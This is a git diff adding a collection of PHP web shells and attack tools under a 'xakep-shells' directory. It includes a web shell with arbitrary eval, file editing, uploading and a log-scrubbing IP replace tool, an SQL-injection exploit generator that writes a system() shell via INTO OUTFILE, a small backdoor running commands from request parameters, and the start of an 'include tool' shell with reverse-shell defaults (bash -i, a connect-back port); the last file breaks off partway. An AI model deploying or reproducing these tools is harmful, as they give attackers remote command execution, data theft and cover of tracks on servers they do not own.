+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile20</i><br>";}
+}
+echo $copyr;
+exit;}
+
+if(@$_GET['yes']=="yes"){
+$d=@$_GET['d']; $e=@$_GET['e'];
+unlink($d."/".$e);
+$delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
+}
+if(@$_GET['clean']=="1"){
+@$e=$_GET['e'];
+$x=fopen("$d/$e","w");
+fwrite($x,"");
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
+exit;
+}
+
+
+if(@$_GET['e']){
+$d=@$_GET['d'];
+$e=@$_GET['e'];
+$pinf=pathinfo($e);
+if(in_array(".".@$pinf['extension'],$images)){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
+exit;}
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+if(is_file($de)){
+if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+File contents:<br>
+$de
+<br>
+<table width=100% border=1 cellpadding=0 cellspacing=0>
+<tr><td><pre>
+$c
+
+</pre></td></tr>
+</table>
+
+";
+
+if(@$_GET['delete']=="1"){
+$delete=$_GET['delete'];
+echo "
+DELETE: Are you sure?<br>
+<a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
+<br>
+";
+if(@$_GET['yes']=="yes"){
+@$d=$_GET['d']; @$e=$_GET['e'];
+echo $delresult;
+}
+if(@$_GET['no']){
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
+";
+}
+
+
+} #end of delete
+echo $copyr;
+exit;
+} #end of e
+
+if(@$_GET['edit']=="1"){
+@$d=$_GET['d'];
+@$ef=$_GET['ef'];
+$e=$ef;
+if(is_file($d."/".$ef)){
+if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+$filename="$d/$ef";
+$fd = @fopen ($filename, "r");
+$c = @fread ($fd, @filesize ($filename));
+$c=htmlspecialchars($c);
+$de=$d."/".$ef;
+$de=str_replace("//","/",$de);
+echo "
+Edit:<br>
+$de<br>";
+
+if(!@$_POST['save']){
+print "
+<form method=post>
+<input name=filename value='$d/$ef'>
+<textarea cols=143 rows=30 name=editf>$c</textarea>
+<br>
+<input type=submit name=save value='Save changes'></form><br>
+";
+}
+if(@$_POST['save']){
+$editf=@$_POST['editf'];
+
+if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
+$editf=stripslashes($editf);
+}
+
+$f=fopen($filename,"w+");
+fwrite($f,"$editf");
+echo "<br>
+<b>File edited.</b>
+<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
+exit;
+}
+echo $copyr;
+exit;
+}
+
+
+
+echo"
+<table width=100% cellpadding=1 cellspacing=0 class=hack>
+<tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
+";
+$dirs=array();
+$files=array();
+$dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
+while (!(($file = readdir($dh)) === false)) {
+if ($file=="." || $file=="..") continue;
+if (@is_dir("$d/$file")) {
+      $dirs[]=$file;
+}else{
+      $files[]=$file;
+      }
+   sort($dirs);
+   sort($files);
+
+$fz=@filesize("$d/$file");
+}
+
+function perm($perms){
+if (($perms & 0xC000) == 0xC000) {
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   $info = 'p';
+} else {
+   $info = 'u';
+}
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+
+
+for($i=0; $i<count($dirs); $i++){
+
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/xakep-shells/PHP/pHpINJ.php.php.txt b/xakep-shells/PHP/pHpINJ.php.php.txt
new file mode 100644
index 0000000..b54acc6
--- /dev/null
+++ b/xakep-shells/PHP/pHpINJ.php.php.txt
@@ -0,0 +1,37 @@
+<?php
+?>
+<html>
+<head>
+<title>|| .::News Remote PHP Shell Injection::. ||   </title>
+</head>
+<body>
+<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />
+<?php
+if (isset($_POST['url'])) {
+$url = $_POST['url'];
+$path2news = $_POST['path2news'];
+$outfile = $_POST ['outfile'];
+$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
+$sql = urlencode($sql);
+$expurl= $url."?id=".$sql ;
+echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
+echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
+}
+else
+{
+?>
+Url to index.php: <br /> 
+<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
+<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
+Server Path to Shell: <br />
+Full server path to a writable file which will contain the Php Shell <br />
+<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
+<input type = "submit" value = "Create Exploit"> <br /> <br />
+
+
+
+<?php
+}
+?>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/php-backdoor.php.txt b/xakep-shells/PHP/php-backdoor.php.txt
new file mode 100644
index 0000000..7defd37
--- /dev/null
+++ b/xakep-shells/PHP/php-backdoor.php.txt
@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+        $filename=$_REQUEST['f'];
+        $file=fopen("$filename","rb");
+        fpassthru($file);
+        die;
+}
+if(isset($_REQUEST['d'])){
+        $d=$_REQUEST['d'];
+        echo "<pre>";
+        if ($handle = opendir("$d")) {
+        echo "<h2>listing of $d</h2>";
+                   while ($dir = readdir($handle)){ 
+                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+                       echo "$dir\n"; 
+                       echo "</font></a>";
+                }
+                       
+        } else echo "opendir() failed";
+        closedir($handle);
+        die ("<hr>"); 
+}
+if(isset($_REQUEST['c'])){
+	echo "<pre>";
+	system($_REQUEST['c']);		   
+	die;
+}
+if(isset($_REQUEST['upload'])){
+
+		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+			else $dir=$_REQUEST['dir'];
+		$fname=$HTTP_POST_FILES['file_name']['name'];
+		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+			die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+	
+	$host=$_REQUEST['host'];
+	$usr=$_REQUEST['usr'];
+	$passwd=$_REQUEST['passwd'];
+	$db=$_REQUEST['db'];
+	$mquery=$_REQUEST['mquery'];
+	mysql_connect("$host", "$usr", "$passwd") or
+    die("Could not connect: " . mysql_error());
+    mysql_select_db("$db");
+    $result = mysql_query("$mquery");
+	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
+    mysql_free_result($result);
+	die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+
+database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+
+<!--	http://michaeldaw.org	2006 	-->
diff --git a/xakep-shells/PHP/php-include-w-shell.php.txt b/xakep-shells/PHP/php-include-w-shell.php.txt
new file mode 100644
index 0000000..2b4b74a
--- /dev/null
+++ b/xakep-shells/PHP/php-include-w-shell.php.txt
@@ -0,0 +1,1312 @@
+<?php
+######################################################################
+# we decide if we want syslogging
+closelog();
+######################################################################
+# define variables
+######################################################################
+
+# error_reporting(E_ALL);
+error_reporting(0);
+
+# get globals even if register_globals is off
+import_globals();
+
+$safe_mode = ini_get('safe_mode');
+$register_globals = ini_get('register_globals');
+$magic_quotes_gpc = ini_get('magic_quotes_gpc');
+$txt['en']['on']="on";
+$txt['en']['off']="off";
+$txt['de']['on']="an";
+$txt['de']['off']="aus";
+$lang="en";
+
+if($safe_mode == 1) $SM = $txt[$lang]['on'];
+else { 
+	$SM = $txt[$lang]['off'];
+	# set_time_limit(9000);
+}
+if($register_globals == 1) $RG = $txt[$lang]['on'];
+else $RG = $txt[$lang]['off'];
+if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
+else $MQ = $txt[$lang]['off'];
+
+# navigatable functions
+$ArrFuncs = array(
+	"dropinc"	=> 0,
+	"filecopy"	=> 0,
+	"fileedit"	=> 0,
+	"showsource"	=> 0,
+	"snoop"		=> 0,
+	"cmdln"		=> 0,
+	"connectback"	=> 0,
+	"phpshell"	=> 0,
+	"servicecheck"	=> 0,
+	"mysqlaccess"	=> 0,
+	"mail"		=> 0,
+	"env"		=> 0,
+	"phpenv"	=> 0,
+	"phpinfo"	=> 0,
+	"dumpvars"	=> 0,
+	"debugscript"	=> 0,
+	"syslog"	=> 0
+);
+
+# init navigation
+foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
+
+
+
+# set default values
+$ArrDefaults = array(
+	"filecopy_source" => "http://...",
+	"filecopy_dest" => getcwd(),
+	"cmdcall" => "",
+	"editfile" => getcwd(),
+	"editcontent" => "",
+	"chdir" => ".",
+	"vsource" => $SCRIPT_FILENAME,
+	"mail_from" => "attacker@0wned.org",
+	"mail_to" => "",
+	"mail_subject" => "", 
+	"mail_attach_source"  => "http://....",
+	"mail_attach_appear"  => "filename...",
+	"mail_content_type"   => "image/png",
+	"mail_msg" => "",
+	"tcpports" => "21 22 23 25 80 110",
+	"timeout" => 5,
+	"miniinc_loc" => getcwd() . "/miniinc.php",
+	"incdbhost" => "localhost",
+	"cbhost" => $_SERVER['REMOTE_ADDR'],
+	"cbport" => 20202,
+	"cbtempdir" => "/tmp",
+	"cbcompiler" => "gcc",
+	"phpshellapp" => "export TERM=xterm; bash -i",
+	"phpshellhost" => "0.0.0.0",
+	"phpshellport" => "20202"
+);
+
+# init defaults
+foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
+
+# define executable functions
+$Mstr = array(
+	0 => "No execute functions available!",
+	1 => "passthru()",
+	2 => "system()",
+	3 => "backticks",
+	4 => "proc_open()",
+	5 => "exec()"
+);
+
+# clean request to avoid uri monster
+$SREQ = "";
+$reqdat = array();
+$tmpCount=0;
+foreach($REQUESTS as $key => $val){
+	if($tmpCount==0) $reqdat[] = $key."=".$val;
+	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
+	$tmpCount++;
+}
+$SREQ = implode("&", $reqdat);
+$tmpCount=0;
+if($SREQ=="") {
+	$tmp_req = array();
+	$tmp_qry = explode("&", $QUERY_STRING);
+	foreach($tmp_qry as $key => $val) {
+		$tmp_val = explode("=", $val);
+		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		$tmpCount++;
+	}
+	$SREQ = implode("&", $tmp_req);
+}
+
+if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];
+
+# set some defaults to avaoid errors
+$is_file   = array();
+$is_dir    = array();
+$is_w_dir  = array();
+$is_w_file = array();
+$emeth=0;
+if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
+$chdir = str_replace("//", "/", $chdir);
+if(substr($chdir, -1) != "/") $chdir .= "/";
+##
+# Setup wether to use PHP_SELF or SCRIPT_NAME
+if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
+else $MyLoc = $SCRIPT_NAME;
+
+# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
+$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
+
+# This is a list of internal inc.inc vars that do not get displayed 
+# inside the dumpvars function (poss for a debug func later?)
+$DebugArr = array(
+	'ARHGFDGFGASDFG',
+	'safe_mode',
+	'register_globals',
+	'magic_quotes_gpc',
+	'txt',
+	'lang',
+	'SM',
+	'RG',
+	'MQ',
+	'ArrFuncs',
+	'val',
+	'key',
+	'env',
+	'phpenv',
+	'phpinfo',
+	'debugscript',
+	'filecopy',
+	'fileedit',
+	'showsource',
+	'snoop',
+	'mail',
+	'cmdln',
+	'syslog',
+	'servicecheck',
+	'dropinc',
+	'mysqlaccess',
+	'ArrDefaults',
+	'filecopy_source',
+	'filecopy_dest',
+	'cmdcall',
+	'editfile',
+	'editcontent',
+	'chdir',
+	'vsource',
+	'mail_from',
+	'mail_to',
+	'mail_subject',
+	'mail_attach_source',
+	'mail_attach_appear',
+	'mail_content_type',
+	'mail_msg',
+	'tcpports',
+	'timeout',
+	'miniinc_loc',
+	'incdbhost',
+	'Mstr',
+	'SREQ',
+	'reqdat',
+	'tmpCount',
+	'is_file',
+	'is_dir',
+	'is_w_dir',
+	'is_w_file',
+	'emeth',
+	'MyLoc',
+	'dumpvarsare',
+	'DebugArr',
+	'cbtempdir',
+	'cbcompiler',
+	'cbhost',
+	'cbport',
+	'phpshelltype',
+	'phpshellapp',
+	'phpshellhost',
+	'phpshellport'
+);
+
+
+# activate syslog entry
+if($syslog == 1)
+{
+#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
+#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
+}
+###############################################################################
+#
+# start include output 
+#
+###############################################################################
+$strOutput = "";
+$strOutput .= "<html><body bgcolor='#ffffff'>
+<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
+<center>
+<h2>Include tool</h2>
+PHP Version: " . phpversion() . " | 
+safe_mode: $SM |
